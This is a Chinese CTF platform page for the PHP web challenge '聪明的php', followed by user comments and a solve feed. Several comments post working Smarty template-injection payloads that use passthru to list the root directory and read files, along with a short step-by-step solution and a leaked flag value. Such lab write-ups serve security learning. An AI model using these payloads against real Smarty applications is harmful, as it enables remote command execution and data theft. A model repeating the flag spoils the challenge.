聪明的phpWEB 未解决

分数: 25 金币: 2
题目作者: midi
一  血: Lazzaro
一血奖励: 3金币
解  决: 4081
提  示:
描  述:
聪明的php
评论
fuhaiyan 6月前

?a={{passthru('more ../../../*|grep fla')}}

回复 4

对对对对对对对对 7月前

?key={{passthru(%27tac%20/_4427%27)}}

回复 0

anony 11月前

flag{********}

回复 0

人闲桂花落 1年前

tac命令读取也可

回复 0

docker0w 1年前

1. 随意构造URL参数获取源代码信息 ?test=test 2. 根据源代码得知使用Smarty 并搜索得知存在模板注入漏洞 3. 根据已过滤函数,使用passthru函数即可回显 4. 使用passthru执行命令 ls -a / 得到根据下存在start.sh 脚本信息 5. 根据脚本信息得知flag为随机生成在根路径下 且使用_下划线文件明名 6. 使用show_source获

回复 4

bx33661 1年前

?key={passthru("tac%20/_28710")}

回复 0

yun20231227 1年前

?key={{passthru('ls /')}}

回复 1

xinkuang 2年前

http://114.67.175.224:13208/?a={if%20passthru(%22more%20/_30010%22)}{/if}

回复 1

Daniel2023 2年前

flag{0e54d64e616af92957ddbb6c6ea37c5f}

回复 0

一路奔腾 2年前

?a={passthru("ls -al /")}找到特殊的一样_24542这样的文件,?f={passthru("tac%20/_13075")}查看文件内容得到flag。参考:https://zhuanlan.zhihu.com/p/401583380,,,,https://blog.csdn.net/m_de_g/article/details/120

回复 0

WriteUp

image
midi

3 金币

评分(13)

解题动态

Sylvia 攻破了该题 4小时前
juzijuzi 攻破了该题 21小时前
青云07 攻破了该题 1天前
sonneay 攻破了该题 2天前
王海住 攻破了该题 2天前
MOTMlsc 攻破了该题 2天前
Kur0Ai1uro. 攻破了该题 2天前
yehlg 攻破了该题 2天前
18943147678 攻破了该题 3天前
dwx386572657 攻破了该题 5天前
zxx256xxz 攻破了该题 7天前
天天1 攻破了该题 8天前
18585011980 攻破了该题 12天前
一介村妇 攻破了该题 12天前
255a 攻破了该题 14天前
凯哥 攻破了该题 14天前
传说中的小菜鸟 攻破了该题 14天前
19818876151 攻破了该题 16天前
星落. 攻破了该题 16天前
linzixi 攻破了该题 16天前
问题反馈